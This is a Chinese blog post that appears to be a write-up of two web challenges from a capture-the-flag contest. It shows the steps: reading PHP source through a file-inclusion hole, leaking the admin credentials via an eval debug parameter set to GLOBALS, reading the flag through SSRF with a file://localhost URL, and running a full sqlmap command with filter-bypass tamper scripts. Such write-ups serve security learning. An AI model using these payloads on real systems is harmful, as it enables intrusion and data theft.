1、Cosmos的博客后台

题目网页是个登录表单.

题目描述只提到php和HTML,所以首先排除sql注入。抓包可看到index.php,和login.php两个包,再联系url中的“action=”猜测可能存在着文件包含漏洞,尝试用php伪协议读index.php和login.php的源码,内容如下: index.php:

<?php
error_reporting(0);
session_start();

if(isset($_SESSION['username'])) {
  header("Location: admin.php");
  exit();
}

$action = @$_GET['action'];
$filter = "/config|etc|flag/i";

if (isset($_GET['action']) && !empty($_GET['action'])) {
  if(preg_match($filter, $_GET['action'])) {
      echo "Hacker get out!";
      exit();
  }
      include $action;
}
elseif(!isset($_GET['action']) || empty($_GET['action'])) {
  header("Location: ?action=login.php");
  exit();
}

login.php:

<?php
include "config.php";
session_start();

//Only for debug
if (DEBUG_MODE){
  if(isset($_GET['debug'])) {
      $debug = $_GET['debug'];
      if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
          die("args error!");
      }
      eval("var_dump($$debug);");
  }
}

if(isset($_SESSION['username'])) {
  header("Location: admin.php");
  exit();
}
else {
  if (isset($_POST['username']) && isset($_POST['password'])) {
      if ($admin_password == md5($_POST['password']) && $_POST['username'] === $admin_username){
          $_SESSION['username'] = $_POST['username'];
          header("Location: admin.php");
          exit();
      }
      else {
          echo "用户名或密码错误";
      }
  }
}
?>

<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="">
  <meta name="author" content="">
  <title>Cosmos的博客后台</title>
  <link href="static/signin.css" rel="stylesheet">
  <link href="static/sticky-footer.css" rel="stylesheet">
  <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
</head>

<body>

<div class="container">
  <form class="form-signin" method="post" action="login.php">
      <h2 class="form-signin-heading">后台登陆</h2>
      <input type="text" name="username" class="form-control" placeholder="用户名" required autofocus>
      <input type="password" name="password" class="form-control" placeholder="密码" required>
      <input class="btn btn-lg btn-primary btn-block" type="submit" value="Submit">
  </form>
</div>
<footer class="footer">
<center>
<div class="container">
      <p class="text-muted">Created by Annevi</p>
    </div>
    </center>
</footer>
</body>
</html>

此外在login.php中还可以看到一个admin.php,继续使用伪协议来读它的源码:

<?php
include "config.php";
session_start();
if(!isset($_SESSION['username'])) {
  header('Location: index.php');
  exit();
}

function insert_img() {
  if (isset($_POST['img_url'])) {
      $img_url = @$_POST['img_url'];
      $url_array = parse_url($img_url);
      if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
          return false;
      }  
      $c = curl_init();
      curl_setopt($c, CURLOPT_URL, $img_url);
      curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
      $res = curl_exec($c);
      curl_close($c);
      $avatar = base64_encode($res);

      if(filter_var($img_url, FILTER_VALIDATE_URL)) {
          return $avatar;
      }
  }
  else {
      return base64_encode(file_get_contents("static/logo.png"));
  }
}
?>

<html>
  <head>
      <title>Cosmos'Blog - 后台管理</title>
  </head>
  <body>
      <a href="logout.php">退出登陆</a>
      <div style="text-align: center;">
          <h1>Welcome <?php echo $_SESSION['username'];?> </h1>
      </div>
      <form action="" method="post">
          <fieldset style="width: 30%;height: 20%;float:left">
              <legend>插入图片</legend>
              <p><label>图片url: <input type="text" name="img_url" placeholder=""></label></p>
              <p><button type="submit" name="submit">插入</button></p>
          </fieldset>
      </form>
      <fieldset style="width: 30%;height: 20%;float:left">
              <legend>评论管理</legend>
              <h2>待开发..</h2>
      </fieldset>
      <fieldset style="width: 30%;height: 20%;">
              <legend>文章列表</legend>
              <h2>待开发..</h2>
      </fieldset>
      <fieldset style="height: 50%">
          <div style="text-align: center;">
              <img height='200' width='500' src='data:image/jpeg;base64,<?php echo insert_img() ? insert_img() : base64_encode(file_get_contents("static/error.jpg")); ?>'>
          </div>
      </fieldset>
  </body>
</html>

阅读源码容易发现不能通过文件包含读config.php文件和flag文件,且发现login.php中有如下内容:

//Only for debug
if (DEBUG_MODE){
  if(isset($_GET['debug'])) {
      $debug = $_GET['debug'];
      if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
          die("args error!");
      }
      eval("var_dump($$debug);");
  }
}

在debug模式开启时,通过可以通过可变变量,令$debug=GLOBALS就能获取到当前已定义的变量的值。

http://cosmos-admin.hgame.day-day.work/?action=login.php&debug=GLOBALS [“admin_password”]=> string(32) “0e114902927253523756713132279690” [“admin_username”]=> string(7) “Cosmos!”

利用获取到的信息我们进行登录.

登陆后有个插入图片的地方,看起来应该从此处下手,利用url来插入图片,考虑是ssrf.然后再去阅读admin.php,发现对我们的url进行了一定的限制:

        if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
          return false;
      }

题目告诉我们flag在根目录,结合admin.php中对url的限制,构造payload:file://localhost/flag f12后看到img标签中有一串base64编码的字符串,对其进行解码,得到flag.

2、Cosmos的留言板-1

题目描述提到了数据库与php的连接,很明显,本题为sql注入.试了一下,过滤了空格和select,使用sqlmap就可以把这题做出来.手动注入用union select也能做,用bool盲注的做法也能行.(我是直接用sqlmap做的,union select做法->https://github.com/vidar-team/Hgame2020_writeup/tree/master/week2, bool盲注做法->https://www.jianshu.com/p/647d752b8d34) sqlmap:python sqlmap.py -u “http://139.199.182.61/index.php?id=1” -D easysql -T f1aggggggggggggg -C fl4444444g –dump –tamper “randomcase.py,space2comment.py”

后面的题没做出来,看官方wp复现的就不写了.官方wp地址:https://github.com/vidar-team/Hgame2020_writeup/tree/master/week2

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号